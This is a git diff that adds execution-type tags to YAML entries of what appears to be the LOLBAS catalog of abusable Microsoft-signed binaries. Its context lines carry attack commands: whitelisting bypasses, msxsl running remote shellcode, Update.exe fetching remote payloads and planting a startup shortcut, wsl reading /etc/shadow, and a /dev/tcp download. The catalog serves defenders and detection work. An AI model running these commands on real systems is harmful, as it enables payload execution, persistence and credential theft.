b2fb1f745..7bbacc260 100644 --- a/yml/OtherMSBinaries/Coregen.yml +++ b/yml/OtherMSBinaries/Coregen.yml @@ -20,6 +20,8 @@ Commands: Privileges: User MitreID: T1055 OperatingSystem: Windows + Tags: + - Execute: DLL - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions. Usecase: Execute DLL code diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 991c1bdef..2a1586662 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CSharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index a63da1507..a72e4b683 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Devinit.yml b/yml/OtherMSBinaries/Devinit.yml index 2ed83b489..e02a70019 100644 --- a/yml/OtherMSBinaries/Devinit.yml +++ b/yml/OtherMSBinaries/Devinit.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: MSI + - Execute: Remote Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index 2a67dc63a..f6f9eeae6 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed + Tags: + - Execute: CMD - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed + Tags: + - Execute: CMD Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index 44a00cd24..f54457e10 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CSharp Full_Path: - Path: no default Code_Sample: diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 39b59be44..16b369ed5 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed + Tags: + - Execute: DLL (.NET) - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any DLL. Usecase: Execute DLL @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed + Tags: + - Execute: DLL (.NET) - Command: dotnet.exe fsi Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands Usecase: Execute arbitrary F# code @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 and up with .NET SDK installed + Tags: + - Execute: FSharp - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code Usecase: Execute code bypassing AWL @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 and up with .NET Core installed + Tags: + - Execute: CSharp Full_Path: - Path: 'C:\Program Files\dotnet\dotnet.exe' Detection: diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index 72b014540..05ac2aad3 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\dxcap.exe - Path: C:\Windows\SysWOW64\dxcap.exe diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index fb183235c..6058ea53f 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: FSharp - Command: fsi.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: FSharp Full_Path: - Path: C:\Program Files\dotnet\sdk\\FSharp\fsi.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 5b55e35a8..4241cbe4e 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: FSharp - Command: fsianycpu.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: FSharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 09c960a8c..c564efacc 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: Mftrace.exe powershell.exe Description: Launch cmd.exe as a subprocess of Mftrace.exe. Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe diff --git a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml index 9ac12c29a..7ca4f43f5 100644 --- a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml +++ b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index cc3754cfb..7cc092177 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server + Tags: + - Execute: CMD - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Description: Launch calc.bat via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server + Tags: + - Execute: CMD - Command: msdeploy.exe -verb:sync -source:filePath=C:\windows\system32\calc.exe -dest:filePath=C:\Users\Public\calc.exe Description: Copy file from source to destination. Usecase: Copy file. diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index 7020e0a22..d87746e4d 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL - Command: msxsl.exe customers.xml script.xsl Description: Run COM Scriptlet code within the script.xsl file (local). Usecase: Local execution of script stored in XSL file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. @@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL + - Execute: Remote - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. @@ -32,6 +39,9 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL + - Execute: Remote - Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o Description: Using remote XML and XSL files, save the transformed XML file to disk. Usecase: Download a file from the internet and save it to disk. diff --git a/yml/OtherMSBinaries/OpenConsole.yml b/yml/OtherMSBinaries/OpenConsole.yml index 81d00e300..d56eaca2e 100644 --- a/yml/OtherMSBinaries/OpenConsole.yml +++ b/yml/OtherMSBinaries/OpenConsole.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 22d880c49..7090e1e74 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CSharp - Command: rcsi.exe bypass.csx Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CSharp Full_Path: - Path: no default Code_Sample: diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 6ea1d455f..cb63fb6bc 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk @@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE + - Execute: Remote Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index 906ca523e..e495ef0de 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index c17ee4a47..b7c66aa0a 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index 0055ff320..a8207ad98 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml @@ -18,6 +18,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --update [url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -25,6 +28,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -32,6 +38,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -39,6 +48,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Squirrel.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index 5c3bdb53f..d5d0580c1 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: WSH - Command: te.exe test.dll Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures. Usecase: Execute DLL file. diff --git a/yml/OtherMSBinaries/Teams.yml b/yml/OtherMSBinaries/Teams.yml index fffb4b1ff..622843c13 100644 --- a/yml/OtherMSBinaries/Teams.yml +++ b/yml/OtherMSBinaries/Teams.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Node.JS - Command: teams.exe Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing. Usecase: Execute JavaScript code @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Node.JS - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Usecase: Executes a process under a trusted Microsoft signed binary @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Teams.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index f4049a496..1dde3d0a0 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -18,6 +18,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -25,6 +28,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -32,6 +38,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -39,6 +48,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -46,6 +58,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -53,6 +68,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Application Whitelisting Bypass @@ -60,6 +78,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: CMD + - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -67,6 +88,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -74,6 +98,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Execute binary @@ -81,6 +108,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: CMD - Command: Update.exe --createShortcut=payload.exe -l=Startup Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary @@ -88,6 +117,8 @@ Commands: Privileges: User MitreID: T1547 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE - Command: Update.exe --removeShortcut=payload.exe -l=Startup Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. Usecase: Execute binary @@ -95,6 +126,8 @@ Commands: Privileges: User MitreID: T1070 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\update.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/VSDiagnostics.yml b/yml/OtherMSBinaries/VSDiagnostics.yml index 88ccc8850..171367810 100644 --- a/yml/OtherMSBinaries/VSDiagnostics.yml +++ b/yml/OtherMSBinaries/VSDiagnostics.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:"/c calc.exe" Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW. Usecase: Proxy execution of binary with arguments @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe Detection: diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 428d73075..86d34a908 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 and up with VS/VScode installed + Tags: + - Execute: EXE Full_Path: - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index d3c0b05be..ed9190087 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: .NetObjects Full_Path: - Path: c:\Program Files (x86)\Windows Kits\10\bin\\arm64\UIAVerify\VisualUiaVerifyNative.exe - Path: c:\Program Files (x86)\Windows Kits\10\bin\\x64\UIAVerify\VisualUiaVerifyNative.exe diff --git a/yml/OtherMSBinaries/VsLaunchBrowser.yml b/yml/OtherMSBinaries/VsLaunchBrowser.yml index 723ed3481..578464cf6 100644 --- a/yml/OtherMSBinaries/VsLaunchBrowser.yml +++ b/yml/OtherMSBinaries/VsLaunchBrowser.yml @@ -20,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: VSLaunchBrowser.exe .exe \\Server\Path\file Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. @@ -27,6 +29,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE + - Execute: Remote Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe diff --git a/yml/OtherMSBinaries/Vshadow.yml b/yml/OtherMSBinaries/Vshadow.yml index 4adf4ff28..36c743df3 100644 --- a/yml/OtherMSBinaries/Vshadow.yml +++ b/yml/OtherMSBinaries/Vshadow.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\\x64\vshadow.exe Detection: diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index 9c983a5d3..e6fb2f311 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\vsjitdebugger.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index e66ddb8f4..40dd2058a 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: XOML Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index e1493d192..92970b54f 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + Tags: + - Execute: EXE - Command: wsl.exe -u root -e cat /etc/shadow Description: Cats /etc/shadow file as root Usecase: Performs execution of arbitrary Linux commands as root without need for password. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + Tags: + - Execute: CMD - Command: wsl.exe --exec bash -c "" Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands. @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 + Tags: + - Execute: CMD - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' Description: Downloads file from 192.168.1.10 Usecase: Download file diff --git a/yml/OtherMSBinaries/winfile.yml b/yml/OtherMSBinaries/winfile.yml index f0171ed32..91c83a708 100644 --- a/yml/OtherMSBinaries/winfile.yml +++ b/yml/OtherMSBinaries/winfile.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\winfile.exe - Path: C:\Windows\winfile.exe